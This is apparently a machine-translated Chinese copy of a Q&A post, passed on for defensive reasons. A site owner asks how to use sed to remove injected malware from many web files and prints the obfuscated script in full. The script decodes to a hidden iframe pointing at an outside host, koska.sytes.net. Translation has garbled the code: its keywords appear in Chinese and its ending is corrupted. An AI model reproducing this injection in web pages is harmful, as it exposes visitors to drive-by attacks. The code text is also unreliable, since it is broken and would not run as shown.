如何使用 sed 删除多个文件中的恶意软件代码？

Question

我在服务器上的许多 .html 和 .php 文件中都有这个恶意软件代码。我需要使用删除它们

• sed -i expression
• 搜索目录下的所有文件 /home/
• 找到受感染的文件

• 通过用空格替换它来删除代码

  VAR usikwseoomg = 'PaBUTyjaZYg3cPaBUTyjaZYg69PaBUTyjaZYg66'; VAR nimbchnzujc = 'PaBUTyjaZYg72'; VAR szwtgmqzekr = 'PaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg20PaBUTyjaZYg6ePaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg3dPaBUTyjaZYg22'; VAR yvofadunjkv = 'PaBUTyjaZYg6dPaBUTyjaZYg67PaBUTyjaZYg79PaBUTyjaZYg65PaBUTyjaZYg64PaBUTyjaZYg61PaBUTyjaZYg67PaBUTyjaZYg70PaBUTyjaZYg7aPaBUTyjaZYg63PaBUTyjaZYg76'; VAR ylydzxyjaci = 'PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg77PaBUTyjaZYg69PaBUTyjaZYg64PaBUTyjaZYg74PaBUTyjaZYg68PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg31PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg68PaBUTyjaZYg65PaBUTyjaZYg69PaBUTyjaZYg67PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22'; VAR xwojmnoxfbs ='PaBUTyjaZYg20PaBUTyjaZYg73PaBUTyjaZYg72PaBUTyjaZYg63PaBUTyjaZYg3dPaBUTyjaZYg22' ; VAR mgsybgilcfx = 'PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg74PaBUTyjaZYg70PaBUTyjaZYg3aPaBUTyjaZYg2fPaBUTyjaZYg2f'; VAR nixyhgyjouf =“koska.sytes.net/phl/logs/index.php';var nesrtqwuirb = '';VAR rqchyojemkn = 'PaBUTyjaZYg6dPaBUTyjaZYg67PaBUTyjaZYg79PaBUTyjaZYg65PaBUTyjaZYg64PaBUTyjaZYg61PaBUTyjaZYg67PaBUTyjaZYg70PaBUTyjaZYg7aPaBUTyjaZYg63PaBUTyjaZYg76'; VAR niupgeebkhf = ''; VAR yyzsvtbnudd = 'PaBUTyjaZYg3cPaBUTyjaZYg2fPaBUTyjaZYg69PaBUTyjaZYg66';VAR tlclvgxfthn = 'PaBUTyjaZYg72PaBUTyjaZYg61'; VAR zxttbudjafh = 'PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg3e'; VAR yydszqnduko =新的Array（）; yydszqnduko [0] =新阵列（usikwseoomg + nimbchnzujc + szwtgmqzekr + yvofadunjkv + ylydzxyjaci + xwojmnoxfbs + mgsybgilcfx + nixyhgyjouf + nesrtqwuirb + rqchyojemkn + niupgeebkhf + yyzsvtbnudd + tlclvgxfthn + zxttbudjafh）;文件[ 'PaBUTyjaZYgwPaBUTyjaZYgrPaBUTyjaZYgiPaBUTyjaZYgtPaBUTyjaZYgePaBUTyjaZYg'.replace（/ PaBUTyjaZYg /克，' '）]（窗口[' PaBUTyjaZYguPaBUTyjaZYgnPaBUTyjaZYgePaBUTyjaZYgsPaBUTyjaZYgcPaBUTyjaZYgaPaBUTyjaZYgpPaBUTyjaZYgePaBUTyjaZYg'.replace（/ PaBUTyjaZYg /克， ''）]（yydszqnduko.toString（） .replace(/PaBUTyjaZYg/g,'%')));yydszqnduko [0] =新阵列（usikwseoomg + nimbchnzujc + szwtgmqzekr + yvofadunjkv + ylydzxyjaci + xwojmnoxfbs + mgsybgilcfx + nixyhgyjouf + nesrtqwuirb + rqchyojemkn + niupgeebkhf + yyzsvtbnudd + tlclvgxfthn + zxttbudjafh）;文件['PaBUTyjaZYgwPaBUTyjaZYgrPaBUTyjaZYgiPaBUTyjaZYgtPaBUTyjaZYgePaBUTyjaZYg'.replace（/ PaBUTyjaZYg /克， ''）]（窗口[ 'PaBUTyjaZYguPaBUTyjaZYgnPaBUTyjaZYgePaBUTyjaZYgsPaBUTyjaZYgcPaBUTyjaZYgaPaBUTyjaZYgpPaBUTyjaZYgePaBUTyjaZYg'.replace（/ PaBUTyjaZYg /克，' '）]（yydszqnduko.toString（）代替（/ PaBUTyjaZYg /克。' ％“）））;yydszqnduko [0] =新阵列（usikwseoomg + nimbchnzujc + szwtgmqzekr + yvofadunjkv + ylydzxyjaci + xwojmnoxfbs + mgsybgilcfx + nixyhgyjouf + nesrtqwuirb + rqchyojemkn + niupgeebkhf + yyzsvtbnudd + tlclvgxfthn + zxttbudjafh）;文件['PaBUTyjaZYgwPaBUTyjaZYgrPaBUTyjaZYgiPaBUTyjaZYgtPaBUTyjaZYgePaBUTyjaZYg'.replace（/ PaBUTyjaZYg /克， ''）]（窗口[ 'PaBUTyjaZYguPaBUTyjaZYgnPaBUTyjaZYgePaBUTyjaZYgsPaBUTyjaZYgcPaBUTyjaZYgaPaBUTyjaZYgpPaBUTyjaZYgePaBUTyjaZYg'.replace（/ PaBUTyjaZYg /克，' '）]（yydszqnduko.toString（）代替（/ PaBUTyjaZYg /克。' ％“）））;PaBUTyjaZYguPaBUTyjaZYgnPaBUTyjaZYgePaBUTyjaZYgsPaBUTyjaZYgcPaBUTyjaZYgaPaBUTyjaZYgpPaBUTyjaZYgePaBUTyjaZYg'.replace(/PaBUTyjaZYg)/PaBUTyjaZYg/g,'d.sg)(PaBUTyjaZYg/g,'d.z)(ybutyjaZYg),(ybqplace)(ybqplace)(ybqplace)PaBUTyjaZYguPaBUTyjaZYgnPaBUTyjaZYgePaBUTyjaZYgsPaBUTyjaZYgcPaBUTyjaZYgaPaBUTyjaZYgpPaBUTyjaZYgePaBUTyjaZYg'.replace(/PaBUTyjaZYg)/PaBUTyjaZYg/g,'d.sg)(PaBUTyjaZYg/g,'d.z)(ybutyjaZYg),(ybqplace)(ybqplace)(ybqplace)

Answer 1

我会说更好/更安全的解决方案是从干净的备份中恢复这些文件。